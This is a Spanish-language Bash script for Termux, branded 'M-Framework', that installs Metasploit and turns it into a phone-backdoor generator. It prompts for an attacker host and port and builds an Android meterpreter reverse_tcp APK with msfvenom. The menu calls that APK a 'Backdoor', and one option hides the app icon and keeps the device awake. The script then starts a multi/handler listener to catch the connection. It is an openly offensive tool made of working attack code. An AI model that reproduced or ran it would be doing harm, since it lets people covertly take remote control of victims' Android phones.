#!/bin/bash
#Colores
g="${b}\033[1;30m"
b="\033[0m"
b1="$b\033[1;37m"
r="${b}\033[1;31m"
r1="${b}\033[31m"
A="${b}\033[1;34m"
A1="${b}\033[34m"
ac="${b}\e[1;36m"
ac1="${b}\e[36m"
v="${b}\033[1;32m"
v1="${b}\033[32m"
m="$b\033[1;35m"
m1="$b\033[35m"
a="$b\033[1;33m"
a1="$b\033[33m"
cy="$b\033[38;2;23;147;209m"
trap Adios INT
Adios() {
                sleep 0.2
		echo -e "${v}\n\n[$b1+$v]$b1 Finished\n$v[$b1+$v]$b1 Created by Anonymous Zpt\n$v[$b1+$v]$b1 Gracias por usar mi herramienta\n$v[$b1+$v]$b1 servicio de ayuda https://t.me/Anonymous_Zpt$b\n"
                sleep 0.0
		exit
	}
banner() {
clear
printf "\n$r  ___ ___$b1           __                             __           __   __\n"
printf "$r |   Y   |$b1 .-----. |  |_  .---.-. .-----. .-----. |  | .-----. |__| |  |_\n"
printf "$r |.      |$b1 |  -__| |   _| |  _  | |__ --| |  _  | |  | |  _  | |  | |   _|\n"
printf "$r |. \_/  |$b1 |_____| |____| |___._| |_____| |   __| |__| |_____| |__| |____|\n"
printf "$r |:  |   |$b1                                |__|\n"
printf "$r |___|___|\n "
}
ruta() {
		echo
		printf "${b1}Defaul: /sdcard/Download $b\n"
                printf "${v}Digite la$r1 ruta${v}\n└═>$b "
                read ruta
		case $ruta in
		"")
		ruta="/sdcard/Download"
		;;
		*)
                if [ -f $ruta ]; then
                echo -e "${r1}[—] Error Ruta No Existe$b"
		sleep 1
                ruta
		fi
		esac
	     }
payload() {
banner
case $(command -v msfvenom) in
"")
echo -e "\n${v}Primero debe instalar metasploit, instalar?$v\n __________\n|$b1 01$v |$b1 Si$v  |\n ——————————\n|$b1 02$v |$b1 No  $v|\n ¯¯¯¯¯¯¯¯¯¯$b\n"
printf "${v}|-${b1}M-Framework$v->$b "
read i_payload
case $i_payload in
01|1)
rta_menu
;;
02|2)
echo -e "${v}Puede volver a ejecuta el script:\n${b1}./M-framework${b}\n"
exit
;;
*)
echo -e "${r1}[—] OPCION INVALIDA..!$b"
sleep 1
payload
esac
;;
*)
nombre() {
		echo
		printf "${b1}Defaul: Main Activity$b\n"
                printf "${v}Digite el$r1 Nombre$v del apk${v}\n└═>$b "
                read nombre
		case $nombre in
                "")
		nombre="Main Activity"
                esac
	}
		nombre
		sleep 0.5
		ruta
		sleep 0.5
host() {
		echo
                printf "${b1}Ejemplo: Jose-Zpt-35098.portmap.io$b\n"
                printf "${v}Digite su$r1 Host${v}\n└═>$b "
                read host
	        case $host in
                "")
                echo -e "${r1}[—] Host Necesario..!$b"
		sleep 1
                host
                esac
        }
                host
		sleep 0.5
port() {
		echo
                printf "${b1}Ejemplo: 35098 $b\n"
                printf "${v}Digite su$r1 Port${v}\n└═>$b "
                read port
                case $port in
                "")
                echo -e "${r1}[—] Port Necesario..!$b"
                sleep 1
                port
                esac
        }
                port
                sleep 0.5
puerto() {
		echo
                printf "${b1}Defaul: 8080$b\n"
                printf "${v}Digite su$r1 Puerto Local${v}\n└═>$b "
                read puerto
		case $puerto in
                "")
		puerto="8080"
                esac
	}
		puerto
		sleep 0.5
icon() {
echo -e "\n${v}Ocultar payload automaticamente?"
echo -e "${b1}Defaul: No${v}"
echo -e " __________"
echo -e "|$b1 01$v |$b1 Si$v  |"
echo -e " ——————————"
echo -e "|$b1 02$v |$b1 No  $v|"
echo -e " ¯¯¯¯¯¯¯¯¯¯$b\n"
printf "${v}|-${b1}M-Framework$v->$b "
read icono_payload
case $icono_payload in
"")
echo -e "$v[$b1+$v]$b1 Generando Payload...$b"
host=$(echo -e "$host" |sed 's/ //')
port=$(echo -e "$port" |sed 's/ //')
ruta=$(echo -e "$ruta" |sed 's/ //')
nombre=$(echo -e "$nombre" |sed 's/ //')
msfvenom -p android/meterpreter/reverse_tcp LHOST=$host LPORT=$port -o $ruta/$nombre.apk
;;
01|1)
echo -e "$v[$b1+$v]$b1 Generando Payload...$b"
host=$(echo -e "$host" |sed 's/ //')
port=$(echo -e "$port" |sed 's/ //')
ruta=$(echo -e "$ruta" |sed 's/ //')
nombre=$(echo -e "$nombre" |sed 's/ //')
msfvenom -p android/meterpreter/reverse_tcp LHOST=$host LPORT=$port AndroidHideAppIcon=true AndroidMeterpreterDebug=true AndroidWakelock=true -o $ruta/$nombre.apk
;;
02|2)
echo -e "$v[$b1+$v]$b1 Generando Payload...$b"
host=$(echo -e "$host" |sed 's/ //')
port=$(echo -e "$port" |sed 's/ //')
ruta=$(echo -e "$ruta" |sed 's/ //')
nombre=$(echo -e "$nombre" |sed 's/ //')
msfvenom -p android/meterpreter/reverse_tcp LHOST=$host LPORT=$port -o $ruta/$nombre.apk
;;
*)
echo -e "${r1}[—] OPCION INVALIDA..!$b"
sleep 1
echo
icon
esac
	}
icon
rm -r msf
printf 'msfconsole -q -x "use exploit/multi/handler;set payload android/meterpreter/reverse_tcp;set lhost ' >> msf
printf "$host;set lport $puerto;exploit" >> msf
printf '"' >> msf
chmod 777 msf
msfconsole -q -x "use exploit/multi/handler;set payload android/meterpreter/reverse_tcp;set lhost $host;set lport $puerto;exploit"
esac
}
menu() {
banner
echo
echo -e "$A [${b1}01${A}]$b1 Android 7.0.1 En Adelante$ac(Instalar Metasploit)\n"
echo -e "$A [${b1}02${A}]$b1 Android 5.0.1 - 6.0.1$ac(Instalar Metasploit)\n"
echo -e "$A [${b1}03${A}]$b1 Crear Payload$ac(Backdoor)\n"
echo -e "$A [${b1}04${A}]$b1 Contacto$ac(Telegram)\n"
echo -e "$A [${b1}05${A}]$b1 Exit$ac(Salir)$b\n"
}
rta_menu() {
menu
printf "${v}|-${b1}M-Framework$v->$b "
read rta_menu
case $rta_menu in
	01|1)
		sleep 1
		echo -e "$v[$b1+$v]$a Instalando Metasploit Framework...$b"
		pkg install -y unstable-repo > /dev/null 2>&1
		pkg install -y metasploit
		echo -e "$v[$b1+$v]$a Metasploit Framework Instalado...$b"
		sleep 2
		payload
		;;
	02|2)
		sleep 1
		echo -e "$v[$b1+$v]$a Instalando Metasploit Framework...$b"
		pkg install -y curl > /dev/null 2>&1
		pkg install ruby -y > /dev/null 2>&1
		gem install bundler:1.17.3
		curl -LO https://github.com/termux/termux-packages/files/3995119/metasploit_5.0.65-1_all.deb.gz
		gunzip metasploit_5.0.65-1_all.deb.gz
		dpkg -i metasploit_5.0.65-1_all.deb
		apt install -f -y
		echo -e "$v[$b1+$v]$a Metasploit Framework Instalado...$b"
		sleep 2
		payload
		;;
	03|3)
		payload
		;;
	04|4)
		termux-open https://t.me/Anonymous_Zpt &>> /dev/null
		echo
		;;
	05|5)
		Adios
		;;
	*)
		echo -e "${r1}[—] OPCION INVALIDA..!$b"
		sleep 1
		rta_menu
		;;
esac
}
rta_menu
